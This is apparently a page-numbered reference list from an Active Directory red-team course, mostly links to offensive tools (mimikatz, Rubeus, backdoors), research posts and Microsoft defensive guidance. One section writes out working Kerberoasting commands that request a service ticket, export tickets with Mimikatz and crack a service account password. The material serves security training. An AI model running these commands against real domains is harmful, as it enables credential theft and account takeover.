10
https://technet.microsoft.com/en-us/library/cc780036(v=ws.10).aspx

16
Check out Invoke-CradleCrafter:
https://github.com/danielbohannon/Invoke-CradleCrafter

20
15 ways to bypass PowerShell execution policy
https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-execution-policy

22
https://github.com/OmerYa/Invisi-Shell/blob/master/InvisiShellProfier/InvisiShellProfiler.cpp
https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview

35
Microsoft Cloud Red Teaming Paper: https://gallery.technet.microsoft.com/Cloud-Red-Teaming-b837392e

40
https://janikvonrotz.ch/2015/09/09/deploy-powershell-activedirectory-module-without-installing-the-remote-server-tools/
https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html

58
Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/dacls-and-aces
Active Directory Rights: https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights
Extended Rights: https://docs.microsoft.com/en-us/previous-versions/tn-archive/ff405676(v=msdn.10)
64
Reference: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc773178(v=ws.10)
82
NTLM Relaying example - https://github.com/antonioCoco/RemotePotato0

87
http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html

88
See more at http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html
http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html

93
https://docs.microsoft.com/en-us/previous-versions/technet-magazine/ff700227(v=msdn.10)

97
https://github.com/gentilkiwi/mimikatz
Unofficial mimikatz guide:
https://adsecurity.org/?p=2207
https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them
https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1
https://github.com/b4rtik/SharpKatz
https://github.com/outflanknl/Dumpert
https://github.com/Flangvik/BetterSafetyKatz
https://github.com/GhostPack/SafetyKatz
https://github.com/skelsec/pypykatz
https://github.com/Hackndo/lsassy
https://github.com/SecureAuthCorp/impacket/
https://github.com/FSecureLABS/physmem2profit
Reference for logon types: https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them
https://github.com/GhostPack/Rubeus/
A repo of popular Offensive C# tools - https://github.com/Flangvik/SharpCollection

113
https://github.com/gentilkiwi/mimikatz
https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-CompressedDll.ps1

126
http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-and.html

128
The krbtgt hash could also be dumped from NTDS.dit.

134
List of SPNs: https://adsecurity.org/?page_id=183

141
http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/
145
https://adsecurity.org/?p=1785
https://adsecurity.org/?p=1714
151
https://docs.microsoft.com/en-us/windows/win32/secauthn/ssp-packages-provided-by-Microsoft
https://attack.mitre.org/wiki/Technique/T1101
https://docs.microsoft.com/en-us/previous-versions/technet-magazine/ee361593(v=msdn.10)
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory
https://adsecurity.org/?p=1906
https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf
Ref for PowerView command: http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/
https://gallery.technet.microsoft.com/Invoke-SDPropagator-to-c99ae41c
170
Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings

171
https://github.com/samratashok/RACE
https://github.com/samratashok/nishang/tree/master/Backdoors
https://docs.microsoft.com/en-us/archive/blogs/wmi/scripting-wmi-namespace-security-part-1-of-3

172
Note: Ignore the 'I/O operation' error.
https://github.com/samratashok/nishang/tree/master/Backdoors

173
https://github.com/HarmJ0y/DAMP
https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40

175
https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin%281%29.pdf

177
Request a ticket using .NET classes:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Invoke-Kerberoast from BC-SECURITY's Empire (https://github.com/BC-SECURITY/Empire) can be used as well; its output can be cracked with John or Hashcat.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -Identity svcadmin

Crack the ticket using tgsrepcrack:
Check if the ticket has been granted:
klist.exe
Export all tickets using Mimikatz:
Invoke-Mimikatz -Command '"kerberos::list /export"'
Crack the service account password:
python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt '.\2-40a10000-studentuser@USSvc~serviceaccount-US.TECHCORP.LOCAL.kirbi'
181
Reference: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

185
https://github.com/HarmJ0y/ASREPRoast

186
Reference: http://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/

188
https://room362.com/post/2016/kerberoast-pt3/

189
https://room362.com/post/2016/kerberoast-pt3/

190
https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
https://adsecurity.org/?p=1667
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn466518(v=ws.11)
195
https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
http://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31
201
https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/3bff5864-8135-400e-bdd9-33b552051d94
https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/
https://www.secureauth.com/blog/kerberos-delegation-spns-and-more
214
https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
224
https://adsecurity.org/?p=1588

227
List of Active Directory SPNs https://adsecurity.org/?page_id=183

232
http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

236
https://adsecurity.org/?p=1588

238
List Active Directory SPNs https://adsecurity.org/?page_id=183

241
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)

243
Diagram source - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

244
See pages 4 and 5 for a summary of attack techniques - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

257
More at: https://docs.microsoft.com/en-us/sql/relational-databases/linked-servers/linked-servers-database-engine

266
https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/how-to-configure-protected-accounts#BKMK_AddtoProtectedUsers

269
https://docs.microsoft.com/en-us/previous-versions/mt227395(v=msdn.10)
275
https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access-reference-material#ESAE_BM

277
https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Defeating%20Pass-the-Hash-Separation-Of-Powers-wp.pdf

280
https://blogs.technet.microsoft.com/cbernier/2015/10/06/microsoft-advanced-threat-analytics/
https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-explore/ata-threats
https://www.blackhat.com/docs/us-17/thursday/us-17-Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf
286
Configuring Additional LSA Protection: https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
https://technet.microsoft.com/en-us/library/cc755321(v=ws.10).aspx